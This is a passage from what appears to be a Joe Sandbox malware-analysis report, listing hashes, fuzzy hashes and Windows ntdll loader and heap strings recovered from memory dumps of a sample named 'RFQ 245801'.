• Opcode ID: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
• Instruction ID: dc928f80127ced58e0ef87ff949d10475f54df84fb6e50b54ea6b6f822f14ad6
• Opcode Fuzzy Hash: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
• Instruction Fuzzy Hash: 28A13E7191162A9BDF329F68CC88BE9F7B8EF48710F1041EAD909A7251D7359E84CF50
Strings
• LdrpCheckModule, xrefs: 0178A117
• Failed to allocated memory for shimmed module list, xrefs: 0178A10F
• minkernel\ntdll\ldrinit.c, xrefs: 0178A121
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
• API String ID: 0-161242083
• Opcode ID: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
• Instruction ID: 6b33cafa93b402765dddbb133e043f63865cef688884d5d85d4d4edb2d82b718
• Opcode Fuzzy Hash: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
• Instruction Fuzzy Hash: EB71DE71A00206DFDB25EF68C984AFEF7F8FB84204F14406DE942EB255E774AA42CB54
Strings
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
• API String ID: 0-1334570610
• Opcode ID: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
• Instruction ID: 2d8cb52d0606861c33f70375b2176dade747ac617b6950b02afe8fd05d503d43
• Opcode Fuzzy Hash: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
• Instruction Fuzzy Hash: E761CE70600301DFDB29DF28C844B6AFBE1FF85308F148599E4498F296D770E981CB91
Strings
• Failed to reallocate the system dirs string !, xrefs: 017982D7
• minkernel\ntdll\ldrinit.c, xrefs: 017982E8
• LdrpInitializePerUserWindowsDirectory, xrefs: 017982DE
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
• API String ID: 0-1783798831
• Opcode ID: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
• Instruction ID: 69bde59306c79a7395239508ad7fd6823f835fa1ea3607fcc5cc1d038a67e0e1
• Opcode Fuzzy Hash: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
• Instruction Fuzzy Hash: 4E41F372544305ABD722EB68DC48B5BF7ECEF48A50F10492AF955D3299E7B0D900CB91
Strings
• @, xrefs: 017DC1F1
• PreferredUILanguages, xrefs: 017DC212
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017DC1C5
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
• API String ID: 0-2968386058
• Opcode ID: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
• Instruction ID: 2744613aea18f2d4fcb337b72f6fa15084ce138cda665eac1e1fdaa9dd50c5f5
• Opcode Fuzzy Hash: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
• Instruction Fuzzy Hash: 23416371E0420DEBDB12DAD8C895FEEFBBDAB18700F14416EEA09B7244D774AA44CB50
Strings
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
• API String ID: 0-1373925480
• Opcode ID: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
• Instruction ID: f8fa6b3dccd98f52f59df9a17c2f3ca44820691accc96306994187fa7b2ed058
• Opcode Fuzzy Hash: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
• Instruction Fuzzy Hash: 2A41F431A04658CBEB26DB99C888BEDFBB8FF95340F140469D903EB796D7349941CB50
Strings
• minkernel\ntdll\ldrredirect.c, xrefs: 017A4899
• Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017A4888
• LdrpCheckRedirection, xrefs: 017A488F
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
• API String ID: 0-3154609507
• Opcode ID: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
• Instruction ID: 09272011ce66559ef06b665e42738e439b865f3bc093614727b83b3845bac2c1
• Opcode Fuzzy Hash: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
• Instruction Fuzzy Hash: 5241D332A442919FCB21CE1CE840A26FBE4EFC9A50F49076DED4AD7215D7B2D800CB81
Strings
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-2558761708
• Opcode ID: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
• Instruction ID: 675aeddb6bd654cf8152107888ce909b9f089d7b66c6cefb89aa40b4b5abe9e9
• Opcode Fuzzy Hash: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
• Instruction Fuzzy Hash: 3911AC32395142DFDB29EA1CC859B6AF3A5EF80616F1881A9F40ACB65ADB30D841CB50
Strings
• Process initialization failed with status 0x%08lx, xrefs: 017A20F3
• minkernel\ntdll\ldrinit.c, xrefs: 017A2104
• LdrpInitializationFailure, xrefs: 017A20FA
Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                  • API String ID: 0-2986994758
                                                                                                                                                                                  • Opcode ID: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                                                                                                                                                                  • Instruction ID: aba1b627513cf19e9f75397be503d447c436f93d16b0204a25c0910851822c3b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FF0FC76780309BBE725D64CDC5AF99B7ACFB81B54F90046DFB00772C6D5B0A640CA51
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: #%u
                                                                                                                                                                                  • API String ID: 48624451-232158463
                                                                                                                                                                                  • Opcode ID: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                                                                                                                                                  • Instruction ID: c6dae95a90671388209164b7f2a108ee5cbe164f6dc5b3dfb6bb940baae24d97
                                                                                                                                                                                  • Opcode Fuzzy Hash: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D715971A0014A9FDB11DFA8C994FAEFBF8BF48704F144065E905E7256EA78EE41CB60
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • LdrResSearchResource Enter, xrefs: 0172AA13
                                                                                                                                                                                  • LdrResSearchResource Exit, xrefs: 0172AA25
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                  • API String ID: 0-4066393604
                                                                                                                                                                                  • Opcode ID: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                                                                                                                                                  • Instruction ID: 5c86fc2b37721d00ee9ebf37d6f4eb1811ad5a57431af5b2108e2b5e93df3245
                                                                                                                                                                                  • Opcode Fuzzy Hash: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BE17E71E40269AFEB22DE9CC984BAEFBBAFF14710F10446AE901E7651D734D942CB50
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: `$`
                                                                                                                                                                                  • API String ID: 0-197956300
                                                                                                                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                  • Instruction ID: bed465f9165ee9c69c1ca7c9f8acdab98f908a023f900b2423c7336cc770c5a9
                                                                                                                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                  • Instruction Fuzzy Hash: FAC1C1312043429BEB25CF28C849B6BFBE5AFD8318F184A2DF696CB291D774D505CB52
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID: Legacy$UEFI
                                                                                                                                                                                  • API String ID: 2994545307-634100481
                                                                                                                                                                                  • Opcode ID: d83b15bb7f475951f825f10e5ba0a230fe13e8f53909ea05dff4fb98af790a40
                                                                                                                                                                                  • Instruction ID: 065c3699c00c5f04cb40dc7058710cceebe46d6c75e7407d6f24422f1acb81e7
                                                                                                                                                                                  • Opcode Fuzzy Hash: d83b15bb7f475951f825f10e5ba0a230fe13e8f53909ea05dff4fb98af790a40
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C615871E407199FDB24DFA8D844BAEFBB9FB48700F14406DE649EB291DB31A944CB50
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$MUI
                                                                                                                                                                                  • API String ID: 0-17815947
                                                                                                                                                                                  • Opcode ID: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                                                                                                                  • Instruction ID: f8de8f86df775d5018cd26ca86befbc7f8d8503946e7820aa37758b90c3312ba
                                                                                                                                                                                  • Opcode Fuzzy Hash: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
                                                                                                                                                                                  • Instruction Fuzzy Hash: 75511871E0021DAEDB11DFA9CC94AEEFBBCEB54B54F100529EA11B7290D7309A05CB60
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0172063D
                                                                                                                                                                                  • kLsE, xrefs: 01720540
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                  • API String ID: 0-2547482624
                                                                                                                                                                                  • Opcode ID: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                                                                                                                  • Instruction ID: e28f8e93adf7a3a0787b8c05ee6ac45ee5116a9e94557eb56b6f5c8948f07373
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 53519C715047528FD734DF69C544AA7FBE4AF84304F20483EFAAA87241E7749546CFA2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0172A2FB
                                                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0172A309
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                  • API String ID: 0-2876891731
                                                                                                                                                                                  • Opcode ID: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                                                                                                                  • Instruction ID: a97f029b315711bd60d75fbc3a913aacd86ffe127a9ecfaecc8e1e0fdcdc8ea5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C41CC31A01669DBDB21DF69C844B6EFBB4FF84700F2440A9E900DB693E2B5D941CB90
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                                                  • Opcode ID: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
                                                                                                                                                                                  • Instruction ID: bee52fb0c18b88431526460da0bd155e611e97da8c9603a898ac1adce85c60f2
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                                                                                                                                                                  • Instruction ID: b43ae686c2182e96e1084eaf4d94d3af3f027e43e54e6f2f9e4865f07666ea20
                                                                                                                                                                                  • Opcode Fuzzy Hash: 530f8cdc33212ab1e2993d299b8f07f1ec0781b04c91f7597c727d5cd3b7b4c9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E32F070A40755AFEB25EF69C8487BEFBF2BF84304F24411DE58A9B285D735A842CB50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                                                                                                                                                                  • Instruction ID: 4ae8b1277a4f1497b5cc96fab624c2b81cbe4d1919f89a15483374f7d94650db
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e26f049440275490d572b9a03668b25a7259032d540685343598b349f21061b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B22AD706046698BEB25CF2DC094772FBF1BF84B02F18849ED9868B286F735D552DB60
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                                                                                                                                                                  • Instruction ID: 0ddf44e4240fc6dc4a600ebd960d571f9509ee258f4b418eb5470495567e89ea
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e1badbf8bdad0999ab27d951a97233c0866533ffbe4347e902f488df20b4ef5
                                                                                                                                                                                  • Instruction Fuzzy Hash: D0329F71A04215CFDB25DF68C480BAAFBF1FF48310F2485AAE956AB755D734E842CB50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                  • Instruction ID: 9721b5e01ae2eb0bafb21969d6708c399d3bf107ccd0a0786175bb3ca6c9a106
                                                                                                                                                                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                                                                  • Instruction Fuzzy Hash: 60F17071E0021A9BDB15DFA9C584BAEFBF5BF48710F088129EA46AB345E734D841DB90
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                                                                                                                                                  • Instruction ID: 444b36b14249ee1f9a8dc10e92bbb23e2a0e7e0a27f9d195f6c5bd1b8689ce56
                                                                                                                                                                                  • Opcode Fuzzy Hash: ffc500d34c74022769c7bf59303a07c662f8c94dad7b31676c9607c77afed80a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AD1E171A0060A8BDF15CF69C881BFEF7F9AF88304F1881AAD955E7241D735EA05CB61
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                                                                                                                                                  • Instruction ID: ccbe04446b6093c0de2c51b1b71074fcea9298715a671d7af77c1df27869e052
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff05cc1aa86abf4c5069811eb92ba7621a0a9531e3e1850c45421237f08e2816
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DE16B71608352CFC715DF28C490A6AFBE0BF89314F15896EF99587352EB31E906CB92
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                                                                                                                                                  • Instruction ID: 5cc4ea796fa55ace53f6aaf07122a5d34fbdef9a8ac48347a906ba0713462d21
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1738452c25bf83169ff9dc3706694474d3ba86e9094cf308f0253cea8f2e6f88
                                                                                                                                                                                  • Instruction Fuzzy Hash: C9D1EF71A002069BDF14DF6CC880ABAF7A5BF54314F14466DEA16DB288EB34E951CB62
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                  • Instruction ID: d623bdc20124b2e94263ff13738f51357e4db6214912d9809230375a038651a2
                                                                                                                                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                                                  • Instruction Fuzzy Hash: 22B1BE75A00605AFEB24DF98C944BABFBB9BFC4305F90462DAA4297394DA30E905CB11
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                  • Instruction ID: c2094183a5523e73012e033723a4f7dfb41a39ebd0bcabb5032f9140a1097150
                                                                                                                                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BB1E531604646AFDB26DB68C854FBEFBF6AF84300F280199E552D7386DB70E941DB90
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cd56ee4c4050a41608baf072da25c3f418e885f64266ba054cf11be1333a8829
                                                                                                                                                                                  • Instruction ID: da7fb99e1c3d095bbfcd58ab7e874d5a139ff70be9b325233726a6df487ccaa3
                                                                                                                                                                                  • Opcode Fuzzy Hash: cd56ee4c4050a41608baf072da25c3f418e885f64266ba054cf11be1333a8829
                                                                                                                                                                                  • Instruction Fuzzy Hash: 36C166702083818FE764DF19C494BABF7E4BF88304F54496DE98987291E775EA09CF92
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 087e748dd28097af80d0bcca7c190cf246af3f879e78f326df6a74ec66ec27c5
• Instruction ID: 988fcff5d82b4b5e6ef6969dfcf36f7d438e0c40c30f93ac00d11697c8e41a60
• Opcode Fuzzy Hash: 087e748dd28097af80d0bcca7c190cf246af3f879e78f326df6a74ec66ec27c5
• Instruction Fuzzy Hash: A5B17070A402668BEB75CF68C880BADF7B5EF44700F1485E9D50AE7285EB70DD85CB21
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3b40a1b95e585a1e8a01af482c55631f4db393bae4921e134111cc1d1a360c51
• Instruction ID: 188991f072076a5147c2e248b41ecc058eda3bd3857a9c64f25a64bf63d4ab27
• Opcode Fuzzy Hash: 3b40a1b95e585a1e8a01af482c55631f4db393bae4921e134111cc1d1a360c51
• Instruction Fuzzy Hash: A8A10831E406159FEB22EB6CC848FADFBB4FB41724F150165EA41AB291DB789E40CB91
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5731b741abe93caa5cf0aa13a85c340b19c06b75fbf2c06e3dbd8f9b56b79135
